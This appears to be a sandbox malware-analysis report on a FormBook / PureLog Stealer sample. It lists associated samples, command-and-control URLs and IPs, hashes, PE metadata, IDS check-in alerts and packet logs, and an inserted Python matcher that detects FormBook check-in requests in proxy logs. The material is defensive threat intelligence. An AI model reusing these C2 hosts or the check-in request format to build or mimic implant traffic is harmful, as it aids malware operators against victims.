  qRNC6mtGhI.exe | malicious | FormBook | www.ainth.com/pz12/?CbY=uBr8txPpVFF&XTixk4Ox=wKkXOPuj+6qRQxpi1YbAo/RdD5Vgm0uLsJUbUuPKtyZfimvU+K3iz8PSEmKL44/FxwVx
  PAZxQIjeuyCNRXg.exe | malicious | FormBook | www.mrwine.xyz/dy13/?wj=nOOUddImUTrWJ0TERE8yX7QbQXzFXI1eXPVGsAvMbd1lknBUetPROzpkz9KaJDttVL7t&CR-=CpfXQDw
  327vRde1h3nsEEG.exe | malicious | FormBook | www.quantron.xyz/mc10/?qR-LsrxH=mDELtYPjPx0yZpAFEaNgLrz9iHnWtEfpEEHnf0FSbXmyQB9SvAgLU3CzK+8ImGRxoFXe&TVm0xb=yj88DTHplR0
91.195.240.19
  Material data sheets Bill of Quantity Steel pipes and chemicals KM C654e21011710050.exe | malicious | FormBook, PureLog Stealer | www.rothability.com/pz12/?Bl=GWRYCobLI4jcGPUzIWUi2QiAbjD1+kEX4+hheiUlvdpj0yPJP3zykytQ5b2eat43krS6&R48=P2M0bFBP0T0
  SC61092U5IO.exe | malicious | FormBook | www.banyan.love/u44f/
  Fatura20240617.exe | malicious | FormBook | www.banyan.love/u44f/
  NEW RFQ - Viasat LSDR.exe | malicious | FormBook, PureLog Stealer | www.fitfindrr.com/838k/?vXuxe=PvkJCit91xsmfEp4ecexhr9HuVddXcgrt4fepj06tr+7v3YKSwK4deNtOn4FMu18qH4jq16y3id1vztqL+UXZZdC86kT9yqDstkVqXEOldiPYHXEgA==&xPN=kZVT_
  22#U0415.exe | malicious | FormBook | www.purpleheartlacey.com/rlev/
  DHL_TOC2_2407081728458457.pdf.exe | malicious | FormBook | www.ndu.wtf/rn94/?vB=lf5P&Txo=kRFddh8ILTCC26VerxbiPlHKuMV/8t4ppXiDGjwVoJTWtPPHaRnE7TNYK4Im+MrbcRhF
  z4AMOSTRA.exe | malicious | FormBook | www.purpleheartlacey.com/rlev/
  z4AMOSTRA.exe | malicious | FormBook | www.purpleheartlacey.com/rlev/
  z3NOVOPEDIDODECOMPRA.exe | malicious | FormBook | www.purpleheartlacey.com/rlev/
  statment-document.scr.exe | malicious | FormBook, PureLog Stealer | www.megadigit.shop/59wl/
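The Context column in this table shows the same check-in shape across every related sample: a four-character campaign directory, then either a GET with two query parameters, one short token and one long base64-like blob in either order (compare www.hinet.tech/rn94/?Txo=...&vB=lf5P with www.ndu.wtf/rn94/?vB=lf5P&Txo=..., the same rn94 campaign and the same DHL_TOC2 sample on two different domains), or a bare POST to the directory (www.banyan.love/u44f/, www.purpleheartlacey.com/rlev/). That shape is what a proxy-log hunt can key on after the domains themselves have rotated. The matcher below is an added example and not part of the report; it runs over constructed proxy-log lines that reuse the page's own URLs. The four-character path length, the 40-character blob threshold and the log field order are my assumptions.

```python
"""Flag FormBook-style check-in requests in a web-proxy log.

Added example; not part of the Joe Sandbox report. The request shape is the
one visible in the Context column of the associated-sample table above:
    GET  /<campaign>/?<k1>=<long base64-like blob>&<k2>=<short token>   (either order)
    POST /<campaign>/                                                    (no query string)
Assumptions, mine rather than the page's: the campaign segment is four
alphanumerics (as in v15n, btrd, rn94, mc10, dy13, h209, pz12, u44f, 838k,
rlev, 59wl), the blob is at least 40 characters, and the log line layout is
"timestamp client method host target". The log lines are constructed.
"""
import re
from urllib.parse import urlsplit

CAMPAIGN_RE = re.compile(r"^/[a-z0-9]{4}/$")
BLOB_RE = re.compile(r"^[A-Za-z0-9+/_-]{40,}={0,2}$")

# Constructed proxy log: the malicious targets are URLs from this page, the
# benign ones are ordinary traffic of the kind seen in the same memory dumps.
SAMPLE_LOG = """\
2024-07-19T08:52:31Z 10.0.0.23 GET www.neurasaudi.com /v15n/?FTL0dZ=MC7jW79DvpbAXJOACJLEaCWT/AP2Kd9jE1xFeh1tqTEwjDB7HW85AKdG2Lw4mA/hM2am&mT=VDKPcJrp9d844v
2024-07-19T08:52:33Z 10.0.0.23 GET www.msn.com /en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
2024-07-19T08:52:40Z 10.0.0.23 POST www.banyan.love /u44f/
2024-07-19T08:52:41Z 10.0.0.23 GET www.ndu.wtf /rn94/?vB=lf5P&Txo=kRFddh8ILTCC26VerxbiPlHKuMV/8t4ppXiDGjwVoJTWtPPHaRnE7TNYK4Im+MrbcRhF
2024-07-19T08:52:45Z 10.0.0.23 GET api.msn.com /v1/news/Feed/Windows?market=en-gb&count=10
2024-07-19T08:52:50Z 10.0.0.23 GET www.example.org /abcd/?q=hello
"""


def split_query(query):
    """Split a query string without percent/plus decoding: '+' and '/' are part of the blob."""
    if not query:
        return []
    return [tuple(kv.partition("=")[::2]) for kv in query.split("&")]


def classify(method, target):
    """Return a verdict label for one request target, or None if it does not match."""
    parts = urlsplit(target)
    if not CAMPAIGN_RE.match(parts.path):
        return None
    params = split_query(parts.query)
    if method == "GET" and len(params) == 2:
        blobs = [v for _, v in params if BLOB_RE.match(v)]
        if len(blobs) == 1:  # exactly one long blob, the other a short token
            return "formbook-checkin-get"
    if method == "POST" and not params:
        # Weak on its own (any four-character directory matches); use it to
        # corroborate a host already seen in a GET hit or on the block list.
        return "formbook-post-candidate"
    return None


def scan_log(text):
    """Return (timestamp, client, host, path, verdict) for every matching line."""
    hits = []
    for line in text.splitlines():
        ts, client, method, host, target = line.split(" ", 4)
        verdict = classify(method, target)
        if verdict:
            hits.append((ts, client, host, urlsplit(target).path, verdict))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(*hit)
```

The GET rule is the one to alert on; the POST rule only narrows a host that is already suspicious. Pair either hit with the host list from the URL table to tell a decoy domain from the one the implant is actually using.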
Match | Associated Sample Name / URL | Detection | Threat Name | Context
parkingpage.namecheap.com
  yEz94BK14pkJoFb.exe | malicious | FormBook, PureLog Stealer | 91.195.240.19
  Material data sheets Bill of Quantity Steel pipes and chemicals KM C654e21011710050.exe | malicious | FormBook, PureLog Stealer | 91.195.240.19
  SC61092U5IO.exe | malicious | FormBook | 91.195.240.19
  Fatura20240617.exe | malicious | FormBook | 91.195.240.19
  NEW RFQ - Viasat LSDR.exe | malicious | FormBook, PureLog Stealer | 91.195.240.19
  22#U0415.exe | malicious | FormBook | 91.195.240.19
  DHL_TOC2_2407081728458457.pdf.exe | malicious | FormBook | 91.195.240.19
  z4AMOSTRA.exe | malicious | FormBook | 91.195.240.19
  z4AMOSTRA.exe | malicious | FormBook | 91.195.240.19
  z3NOVOPEDIDODECOMPRA.exe | malicious | FormBook | 91.195.240.19
www.gtur.top
  V691KUgebCvcYp2.exe | malicious | FormBook, PureLog Stealer | 206.238.13.219
msdklf.dsaf.apkdowncdn.com
  V691KUgebCvcYp2.exe | malicious | FormBook, PureLog Stealer | 206.119.184.153
  9RogliUNrK3XMIU.exe | malicious | FormBook, PureLog Stealer | 206.119.184.153
ssl1.prod.systemdragon.com
  Orden de compra 0307AR24.exe | malicious | FormBook | 104.18.187.223
  order-payment094093.exe | malicious | FormBook, PureLog Stealer | 104.18.188.223
  SecuriteInfo.com.FileRepMalware.16340.31219.exe | malicious | FormBook, NSISDropper | 104.17.158.1
  IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe | malicious | FormBook | 104.17.157.1
  wLlREXsA9M.exe | malicious | FormBook, GuLoader | 104.17.157.1
  sOjxIU25DP.exe | malicious | FormBook, GuLoader | 104.17.157.1
  hi38VYWujz.exe | malicious | FormBook, GuLoader | 104.17.158.1
  Payment_document.docx.doc | malicious | FormBook | 104.17.158.1
  E-dekont_pdf.exe | malicious | FormBook | 104.17.157.1
  E-dekont_pdf.exe | malicious | FormBook, GuLoader | 104.17.158.1
pixie.porkbun.com
  PO-2024151-pdf.gz.exe | malicious | FormBook | 44.227.65.245
  DHL_TOC2_2407081728458457.pdf.exe | malicious | FormBook | 44.227.65.245
  PO._21007438-SCH_30724.exe | malicious | DarkTortilla, FormBook | 44.227.76.166
  AWB NO. 077-57676135055.exe | malicious | FormBook | 44.227.65.245
  7RsDGpyOQk.exe | malicious | FormBook | 44.227.65.245
  INVOICE - MV CNC BANGKOK - ST24PJ-278.exe | malicious | FormBook | 44.227.76.166
  PROFORMA INVOICE - MV CNC BANGKOK - ST24PJ-287.exe | malicious | FormBook
                                                    • 44.227.76.166
                                                    MT103-746394.docGet hashmaliciousFormBookBrowse
                                                    • 44.227.65.245
                                                    SecuriteInfo.com.Exploit.CVE-2018-0798.4.23906.18593.rtfGet hashmaliciousFormBookBrowse
                                                    • 44.227.65.245
                                                    PO TRO-1075 - TRO-1076 904504608468.pdf.exeGet hashmaliciousFormBookBrowse
                                                    • 44.227.76.166
                                                    www.wordcraftart.fun9RogliUNrK3XMIU.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 170.39.213.118
Match | Associated Sample Name / URL | Detection | Threat Name | Context
SEDO-ASDE | Material data sheets Bill of Quantity Steel pipes and chemicals KM C654e21011710050.exe | malicious | FormBook, PureLog Stealer | 91.195.240.19
 | SC61092U5IO.exe | malicious | FormBook | 91.195.240.19
 | Fatura20240617.exe | malicious | FormBook | 91.195.240.19
 | H37012.exe | malicious | FormBook, PureLog Stealer | 91.195.240.123
 | NEW RFQ - Viasat LSDR.exe | malicious | FormBook, PureLog Stealer | 91.195.240.19
 | 22#U0415.exe | malicious | FormBook | 91.195.240.19
 | DHL_TOC2_2407081728458457.pdf.exe | malicious | FormBook | 91.195.240.19
 | z4AMOSTRA.exe | malicious | FormBook | 91.195.240.19
 | z4AMOSTRA.exe | malicious | FormBook | 91.195.240.19
 | z3NOVOPEDIDODECOMPRA.exe | malicious | FormBook | 91.195.240.19
AMAZON-02US | S04307164.exe | malicious | FormBook, PureLog Stealer | 76.223.105.230
 | Shipping Documents.exe | malicious | FormBook, PureLog Stealer | 76.223.67.189
 | file.exe | malicious | Unknown | 143.204.215.122
 | yEz94BK14pkJoFb.exe | malicious | FormBook, PureLog Stealer | 76.223.105.230
 | file.exe | malicious | Unknown | 143.204.215.18
 | appdrivesound.exe | malicious | SystemBC | 52.62.236.135
 | payment swift 77575.exe | malicious | FormBook, PureLog Stealer | 13.248.169.48
 | V691KUgebCvcYp2.exe | malicious | FormBook, PureLog Stealer | 3.64.163.50
 | file.exe | malicious | Unknown | 143.204.215.105
 | file.exe | malicious | Unknown | 143.204.215.122
PETRONAS-BHD-AS-APPetroliamNasionalBerhadMY | 544fo2biO9.elf | malicious | Mirai, Moobot | 170.39.112.149
 | Lt9n9tfJhl.elf | malicious | Unknown | 170.38.145.93
 | hZ80PhOmKK.elf | malicious | Unknown | 170.38.169.18
 | Asiaction__ Purchase Order_Specification.exe | malicious | FormBook | 170.39.213.43
 | Y0gm1e2z6O.elf | malicious | Mirai | 170.39.159.198
 | UuD1zt2QpK.elf | malicious | Mirai | 170.39.112.150
 | qJNrNXMSir.elf | malicious | Mirai | 170.38.145.53
 | Y31ikuyDAd.elf | malicious | Mirai | 170.39.159.172
 | 2U7qDYujmP.elf | malicious | Mirai, Gafgyt | 170.38.169.43
 | jBYcDlB7fE.elf | malicious | Unknown | 170.38.210.229
COGECO-PEER1CA | Petromasila 16072024.exe | malicious | FormBook, PureLog Stealer | 162.254.38.5
 | 5CxmQXL0LD.exe | malicious | SystemBC | 76.74.238.253
 | jew.arm6.elf | malicious | Mirai | 66.234.10.211
 | sora.arm7.elf | malicious | Mirai | 216.65.83.154
 | zisD7MC388.elf | malicious | Mirai | 216.65.83.140
 | Electronic Order.exe | malicious | FormBook | 162.254.38.56
 | 502407267 RUAG FOODPLAZA.exe | malicious | DarkTortilla, FormBook | 162.254.38.56
 | Inquiry PR#27957.bat.exe | malicious | FormBook | 162.254.38.56
 | arm7.elf | malicious | Mirai | 66.129.182.10
 | DRAFT CONTRACT COPY_938840.scr | malicious | FormBook | 162.254.38.56
                                                    No context
                                                    No context
                                                    Process:C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1216
                                                    Entropy (8bit):5.34331486778365
                                                    Encrypted:false
                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                    Malicious:true
                                                    Reputation:high, very likely benign file
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.974848614050264
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    • DOS Executable Generic (2002/1) 0.01%
                                                    File name:AB2hQJZ77ipdWem.exe
                                                    File size:620'544 bytes
                                                    MD5:f640126d8e76c2a343754ff0f41c1eef
                                                    SHA1:b00e9297c74fe4847f4a0667d9cc4379409cb501
                                                    SHA256:f9e519cd66cb6bed521306afb703672ef2ed9d82d8341398c4199be4523cad96
                                                    SHA512:cd05b460ce74792dbc91891cc13ad888f894c05747907bce0dd79193a126e996e7efadfb7831aee0fd219f3ba92f55858cdf4dbfed876280585daedb92c20083
                                                    SSDEEP:12288:1DrlAypLTnapSEkztfGLI70wWsrRJvHG5yCgMLCAUIKtT:PAyp/naSft+s70wfHvH3iCp9
                                                    TLSH:58D42351FE1D66A3D7FF27B03195A24483F1D536EC31EBC92C8222855EA6B890722737
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.f..............0..Z...........x... ........@.. ....................................@................................
                                                    Icon Hash:1ec7e8e4c4ec5065
                                                    Entrypoint:0x4978fa
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x66973BB8 [Wed Jul 17 03:34:16 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                    Instruction
                                                    jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x978a8 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x98000 | 0x1940 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x9a000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x95900 | 0x95a00 | 7edf75bf45b49dfc1b28e17b42634c1c | False | 0.9652908312447787 | data | 7.981823321678096 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x98000 | 0x1940 | 0x1a00 | 11d65322ebc5e356da3d77ef3f4552af | False | 0.7663762019230769 | data | 7.040864487013515 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x9a000 | 0xc | 0x200 | d8f8be3bb784a6126214ecc93dd72a6d | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x98100 | 0x12bf | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9020629297770368
RT_GROUP_ICON | 0x993d0 | 0x14 | data | | | 1.05
RT_VERSION | 0x993f4 | 0x34c | data | | | 0.42890995260663506
RT_MANIFEST | 0x99750 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
07/19/24-10:55:49.050541 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49439 | 80 | 192.168.2.8 | 44.227.65.245
07/19/24-10:52:45.942774 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49430 | 80 | 192.168.2.8 | 209.196.146.115
07/19/24-10:54:06.708018 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49435 | 80 | 192.168.2.8 | 170.39.213.118
07/19/24-10:53:46.666794 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49434 | 80 | 192.168.2.8 | 206.119.184.155
07/19/24-10:55:29.005476 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49438 | 80 | 192.168.2.8 | 104.18.187.223
07/19/24-10:54:27.084313 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49436 | 80 | 192.168.2.8 | 3.64.163.50
07/19/24-10:54:47.510969 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49437 | 80 | 192.168.2.8 | 3.33.130.190
07/19/24-10:56:09.602206 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49440 | 80 | 192.168.2.8 | 162.241.244.34
07/19/24-10:53:06.518711 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49431 | 80 | 192.168.2.8 | 91.195.240.19
07/19/24-10:56:32.639578 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49441 | 80 | 192.168.2.8 | 206.238.13.219
Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
2024-07-19T10:54:27.594084+0200 | TCP | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 49436 | 80 | 192.168.2.8 | 3.64.163.50
2024-07-19T10:52:03.353420+0200 | TCP | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 49438 | 80 | 192.168.2.8 | 104.18.187.223
2024-07-19T10:53:07.100331+0200 | TCP | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 49431 | 80 | 192.168.2.8 | 91.195.240.19
2024-07-19T10:52:46.453138+0200 | TCP | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 49430 | 80 | 192.168.2.8 | 209.196.146.115
2024-07-19T10:55:49.562853+0200 | TCP | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 49439 | 80 | 192.168.2.8 | 44.227.65.245
2024-07-19T10:54:07.228817+0200 | TCP | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 49435 | 80 | 192.168.2.8 | 170.39.213.118
2024-07-19T10:56:10.109951+0200 | TCP | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 49440 | 80 | 192.168.2.8 | 162.241.244.34
2024-07-19T10:52:03.353420+0200 | TCP | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 49437 | 80 | 192.168.2.8 | 3.33.130.190
2024-07-19T10:52:03.353420+0200 | TCP | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 49441 | 80 | 192.168.2.8 | 206.238.13.219
2024-07-19T10:53:47.271174+0200 | TCP | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 49434 | 80 | 192.168.2.8 | 206.119.184.155
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 19, 2024 10:52:45.934278011 CEST | 49430 | 80 | 192.168.2.8 | 209.196.146.115
Jul 19, 2024 10:52:45.939424038 CEST | 80 | 49430 | 209.196.146.115 | 192.168.2.8
Jul 19, 2024 10:52:45.942672968 CEST | 49430 | 80 | 192.168.2.8 | 209.196.146.115
Jul 19, 2024 10:52:45.942774057 CEST | 49430 | 80 | 192.168.2.8 | 209.196.146.115
Jul 19, 2024 10:52:45.947684050 CEST | 80 | 49430 | 209.196.146.115 | 192.168.2.8
Jul 19, 2024 10:52:46.447339058 CEST | 49430 | 80 | 192.168.2.8 | 209.196.146.115
Jul 19, 2024 10:52:46.453067064 CEST | 80 | 49430 | 209.196.146.115 | 192.168.2.8
Jul 19, 2024 10:52:46.453138113 CEST | 49430 | 80 | 192.168.2.8 | 209.196.146.115
Jul 19, 2024 10:53:06.510914087 CEST | 49431 | 80 | 192.168.2.8 | 91.195.240.19
Jul 19, 2024 10:53:06.515911102 CEST | 80 | 49431 | 91.195.240.19 | 192.168.2.8
Jul 19, 2024 10:53:06.518676043 CEST | 49431 | 80 | 192.168.2.8 | 91.195.240.19
Jul 19, 2024 10:53:06.518711090 CEST | 49431 | 80 | 192.168.2.8 | 91.195.240.19
Jul 19, 2024 10:53:06.523663998 CEST | 80 | 49431 | 91.195.240.19 | 192.168.2.8
Jul 19, 2024 10:53:07.010144949 CEST | 49431 | 80 | 192.168.2.8 | 91.195.240.19
Jul 19, 2024 10:53:07.100114107 CEST | 80 | 49431 | 91.195.240.19 | 192.168.2.8
Jul 19, 2024 10:53:07.100331068 CEST | 49431 | 80 | 192.168.2.8 | 91.195.240.19
Jul 19, 2024 10:53:46.661313057 CEST | 49434 | 80 | 192.168.2.8 | 206.119.184.155
Jul 19, 2024 10:53:46.666182995 CEST | 80 | 49434 | 206.119.184.155 | 192.168.2.8
Jul 19, 2024 10:53:46.666451931 CEST | 49434 | 80 | 192.168.2.8 | 206.119.184.155
Jul 19, 2024 10:53:46.666794062 CEST | 49434 | 80 | 192.168.2.8 | 206.119.184.155
Jul 19, 2024 10:53:46.671567917 CEST | 80 | 49434 | 206.119.184.155 | 192.168.2.8
Jul 19, 2024 10:53:47.166687965 CEST | 49434 | 80 | 192.168.2.8 | 206.119.184.155
Jul 19, 2024 10:53:47.216063023 CEST | 80 | 49434 | 206.119.184.155 | 192.168.2.8
Jul 19, 2024 10:53:47.271116972 CEST | 80 | 49434 | 206.119.184.155 | 192.168.2.8
Jul 19, 2024 10:53:47.271173954 CEST | 49434 | 80 | 192.168.2.8 | 206.119.184.155
Jul 19, 2024 10:54:06.702732086 CEST | 49435 | 80 | 192.168.2.8 | 170.39.213.118
Jul 19, 2024 10:54:06.707612038 CEST | 80 | 49435 | 170.39.213.118 | 192.168.2.8
Jul 19, 2024 10:54:06.708018064 CEST | 49435 | 80 | 192.168.2.8 | 170.39.213.118
Jul 19, 2024 10:54:06.708018064 CEST | 49435 | 80 | 192.168.2.8 | 170.39.213.118
Jul 19, 2024 10:54:06.712975979 CEST | 80 | 49435 | 170.39.213.118 | 192.168.2.8
Jul 19, 2024 10:54:07.213336945 CEST | 49435 | 80 | 192.168.2.8 | 170.39.213.118
Jul 19, 2024 10:54:07.223520994 CEST | 80 | 49435 | 170.39.213.118 | 192.168.2.8
Jul 19, 2024 10:54:07.228816986 CEST | 49435 | 80 | 192.168.2.8 | 170.39.213.118
                                                    Jul 19, 2024 10:54:27.078833103 CEST4943680192.168.2.83.64.163.50
                                                    Jul 19, 2024 10:54:27.083753109 CEST80494363.64.163.50192.168.2.8
                                                    Jul 19, 2024 10:54:27.084245920 CEST4943680192.168.2.83.64.163.50
                                                    Jul 19, 2024 10:54:27.084312916 CEST4943680192.168.2.83.64.163.50
                                                    Jul 19, 2024 10:54:27.089147091 CEST80494363.64.163.50192.168.2.8
                                                    Jul 19, 2024 10:54:27.588129044 CEST4943680192.168.2.83.64.163.50
                                                    Jul 19, 2024 10:54:27.594008923 CEST80494363.64.163.50192.168.2.8
                                                    Jul 19, 2024 10:54:27.594084024 CEST4943680192.168.2.83.64.163.50
                                                    Jul 19, 2024 10:54:47.506005049 CEST4943780192.168.2.83.33.130.190
                                                    Jul 19, 2024 10:54:47.510848045 CEST80494373.33.130.190192.168.2.8
                                                    Jul 19, 2024 10:54:47.510920048 CEST4943780192.168.2.83.33.130.190
                                                    Jul 19, 2024 10:54:47.510968924 CEST4943780192.168.2.83.33.130.190
                                                    Jul 19, 2024 10:54:47.515789986 CEST80494373.33.130.190192.168.2.8
                                                    Jul 19, 2024 10:54:47.982444048 CEST80494373.33.130.190192.168.2.8
                                                    Jul 19, 2024 10:54:47.982496023 CEST80494373.33.130.190192.168.2.8
                                                    Jul 19, 2024 10:54:47.982640028 CEST4943780192.168.2.83.33.130.190
                                                    Jul 19, 2024 10:54:47.982640028 CEST4943780192.168.2.83.33.130.190
                                                    Jul 19, 2024 10:54:47.987586021 CEST80494373.33.130.190192.168.2.8
UDP Packets
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 19, 2024 10:52:29.938411951 CEST | 53 | 56367 | 1.1.1.1 | 192.168.2.8
Jul 19, 2024 10:52:45.214251041 CEST | 62696 | 53 | 192.168.2.8 | 1.1.1.1
Jul 19, 2024 10:52:45.932492971 CEST | 53 | 62696 | 1.1.1.1 | 192.168.2.8
Jul 19, 2024 10:53:06.198360920 CEST | 50444 | 53 | 192.168.2.8 | 1.1.1.1
Jul 19, 2024 10:53:06.508316994 CEST | 53 | 50444 | 1.1.1.1 | 192.168.2.8
Jul 19, 2024 10:53:45.880135059 CEST | 60582 | 53 | 192.168.2.8 | 1.1.1.1
Jul 19, 2024 10:53:46.659255981 CEST | 53 | 60582 | 1.1.1.1 | 192.168.2.8
Jul 19, 2024 10:54:06.574753046 CEST | 50138 | 53 | 192.168.2.8 | 1.1.1.1
Jul 19, 2024 10:54:06.700939894 CEST | 53 | 50138 | 1.1.1.1 | 192.168.2.8
Jul 19, 2024 10:54:27.050759077 CEST | 65423 | 53 | 192.168.2.8 | 1.1.1.1
Jul 19, 2024 10:54:27.074752092 CEST | 53 | 65423 | 1.1.1.1 | 192.168.2.8
Jul 19, 2024 10:54:47.479521036 CEST | 58757 | 53 | 192.168.2.8 | 1.1.1.1
Jul 19, 2024 10:54:47.505238056 CEST | 53 | 58757 | 1.1.1.1 | 192.168.2.8
Jul 19, 2024 10:55:08.003603935 CEST | 56261 | 53 | 192.168.2.8 | 1.1.1.1
Jul 19, 2024 10:55:08.045711994 CEST | 53 | 56261 | 1.1.1.1 | 192.168.2.8
Jul 19, 2024 10:55:28.464570999 CEST | 53126 | 53 | 192.168.2.8 | 1.1.1.1
Jul 19, 2024 10:55:28.990845919 CEST | 53 | 53126 | 1.1.1.1 | 192.168.2.8
Jul 19, 2024 10:55:48.902128935 CEST | 54196 | 53 | 192.168.2.8 | 1.1.1.1
Jul 19, 2024 10:55:49.043155909 CEST | 53 | 54196 | 1.1.1.1 | 192.168.2.8
Jul 19, 2024 10:56:09.339133978 CEST | 54442 | 53 | 192.168.2.8 | 1.1.1.1
Jul 19, 2024 10:56:09.595905066 CEST | 53 | 54442 | 1.1.1.1 | 192.168.2.8
Jul 19, 2024 10:56:32.073312044 CEST | 57045 | 53 | 192.168.2.8 | 1.1.1.1
Jul 19, 2024 10:56:32.632416964 CEST | 53 | 57045 | 1.1.1.1 | 192.168.2.8
DNS Queries
